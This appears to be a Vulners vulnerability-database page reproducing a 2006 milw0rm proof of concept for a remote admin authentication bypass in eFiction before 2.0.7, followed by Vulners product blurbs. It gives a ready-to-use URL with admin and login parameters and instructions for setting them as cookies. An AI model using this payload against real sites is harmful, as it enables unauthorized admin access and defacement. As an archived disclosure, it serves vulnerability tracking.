Vulners
Lucene search
eFiction < 2.0.7 - Remote Admin Authentication Bypass
##########################################
# eFiction vulnerability
##########################################
# I am releasing this to the public. Vendor was notified. Someone is also illegally defacing
these websites under MY name, which is a shame because they ripped it from a private discussion
on g00ns.net. This proof of concept is not to be used to illegally hack websites. I do not condone,
nor act in this type of activity. I suggest whomever is defacing websites under my name stop,
since you would gain more notorioty under your own name.
##########################################
http://[target].com/efiction/index.php?adminloggedin=1&loggedin=1&level=1
Use firefox's extension "add n edit cookies" to add these to your cookies so they stick.
(ie: instead of $_GET['loggedin'] its $_COOKIE['loggedin'] which stays with each page)
# milw0rm.com [2006-08-25]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Aug 2006 00:00Current
7.4High risk
Vulners AI Score7.4